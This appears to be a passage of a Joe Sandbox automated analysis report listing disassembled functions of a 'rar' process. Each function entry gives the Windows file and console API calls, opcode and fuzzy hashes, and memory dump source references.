                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleFileHandleModeType
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4141822043-0
                                                                                                                                                                                                                              • Opcode ID: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                                                                                                                                                                                              • Instruction ID: a41e55868c52db693fa246e8a7bd1b3ad1f7dd6f1b21993e04aa77f19cd82ed2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 65E08C20E0C612C3FA587766A865138A352BF49BB0F801034D80F8AB50EEAC94858320
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                              • Opcode ID: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                                                                                                                                                                                              • Instruction ID: 65b72a8c740fc5b552dc7eb6f0510826ba3d7d5eb58c839cba177ca5a259438f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1E04F20B0C727C2FA44BB74988177963527F88761F445838CC1E03393CEBEA8088370
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CharEnvironmentExpandStrings
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4052775200-0
                                                                                                                                                                                                                              • Opcode ID: fcc6bb39599084807c43192b89aab19ff5ae85cc802a468cbb490d5049967146
                                                                                                                                                                                                                              • Instruction ID: 3c1333d3a64c8baadad4885c341cdf499603961e96675e21412b36b615d24846
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fcc6bb39599084807c43192b89aab19ff5ae85cc802a468cbb490d5049967146
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 38E19122A1C6A2C5FB30BB65A4801BDA7E1FB527A4F844131DB9D47AD9DFBCE481C710
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNELBASE(?,?,00000800,?,00000000,00007FF74EE87EBE,00000000,00000000,00000000,00000000,00000007,00007FF74EE87C48), ref: 00007FF74EE91B8D
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,?,00000800,?,00000000,00007FF74EE87EBE,00000000,00000000,00000000,00000000,00000007,00007FF74EE87C48), ref: 00007FF74EE91BD7
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                                              • Opcode ID: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                                                                                                                                                                                              • Instruction ID: 058c4fb5ef156ac90146dfd1703cf7889e2b498178527669dd0e6835c5e06eda
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E931F263A1C651C6F770BF24E4053A9A6A0BB41BB8F914334DAAC076C5EFBDC8858750
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 932687459-0
                                                                                                                                                                                                                              • Opcode ID: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
                                                                                                                                                                                                                              • Instruction ID: 87adbf7a8993ab096a7f3b8e8865773ae5fd8628f13d384ad721a0de375351b4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC218453908F86C2EB01EF29D5410B86360FB98B98B58A331DF9D43656EF78E5E58300
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: dcd120a5c2abc7f22aede06b124c0f145b5284f270e22049442def7f6cd7490e
                                                                                                                                                                                                                              • Instruction ID: d8df6382378d0bf7c3a70ca3a6d29ebb43190c07e1e2e762958ead6be7157d29
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dcd120a5c2abc7f22aede06b124c0f145b5284f270e22049442def7f6cd7490e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D911813150DB82C1FA10BB64A5403A9F2E4FF957E0F940639DA9D077E6DEB8D4518320
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                                                                                              • Opcode ID: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                                                                                                                                                                                              • Instruction ID: 1bb34ded101149fe8bb4ed9c69ed96fa3cde1427a9b6dcd4a39865a758dd5f2e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D901C221A1D6A1C2FE647B26B400069B2A1BF49BB0F949230DE6D43BD5CE7CE4418710
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • setbuf.LIBCMT ref: 00007FF74EE87A7B
                                                                                                                                                                                                                                • Part of subcall function 00007FF74EED2AE4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF74EED7EF3
                                                                                                                                                                                                                              • setbuf.LIBCMT ref: 00007FF74EE87A8F
                                                                                                                                                                                                                                • Part of subcall function 00007FF74EE87B44: GetStdHandle.KERNEL32(?,?,?,00007FF74EE87A9E), ref: 00007FF74EE87B4A
                                                                                                                                                                                                                                • Part of subcall function 00007FF74EE87B44: GetFileType.KERNELBASE(?,?,?,00007FF74EE87A9E), ref: 00007FF74EE87B56
                                                                                                                                                                                                                                • Part of subcall function 00007FF74EE87B44: GetConsoleMode.KERNEL32(?,?,?,00007FF74EE87A9E), ref: 00007FF74EE87B69
                                                                                                                                                                                                                                • Part of subcall function 00007FF74EED2ABC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF74EED2AD0
                                                                                                                                                                                                                                • Part of subcall function 00007FF74EED2B40: _invalid_parameter_noinfo.LIBCMT ref: 00007FF74EED2C1C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo$setbuf$ConsoleFileHandleModeType
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4044681568-0
                                                                                                                                                                                                                              • Opcode ID: 4e01616fa307debef67f3bdae5e4254b32b96fa30cb3d95000aeda74735f0c5a
                                                                                                                                                                                                                              • Instruction ID: 2563d436a4b58e9b864a1e95e7909d3ce71129fc7b9293ac9f1352d3e46091e4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e01616fa307debef67f3bdae5e4254b32b96fa30cb3d95000aeda74735f0c5a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B501D700F0D1E395FA18B3B65462BB9A443BF95330FD88178E52D4B2D3DD9C24528375
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                                                                                              • Opcode ID: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                                                                                                                                                                                              • Instruction ID: f9e59cbeeb972e274beba33c2adc0c2e02c62c9ccd4bf6e78e448ae8d3157cb4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D013C21A0CA92D1FF64BB29F4442A8A3A0BB45778F944731D17D461E6CFACD58AC760
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(00000800,00007FF74EE9305D,?,?,?,?,?,?,?,?,00007FF74EEA4126,?,?,?,?,00000800), ref: 00007FF74EE930F0
                                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF74EEA4126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF74EE93119
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                                              • Opcode ID: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                                                                                                                                                                                              • Instruction ID: f6d282e7306c1abfcc28bc05f472288ef021ae408ad8b357537f75626615d2b1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32F0AF21B1CA91C1FA60BB25F4543B9A290BB4D7F4FC00130EADD87BA9CFACD5848A10
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DirectoryLibraryLoadSystem
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1175261203-0
                                                                                                                                                                                                                              • Opcode ID: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                                                                                                                                                                                              • Instruction ID: 89ccd15b9ce80808f39fc7161a4d8625bafcd838561eb497dba39f35e6f4365e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76F06221B2C591C6F670BB20F8153FAB264BF88794FC04031E9CD86699EFACD2448A20
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
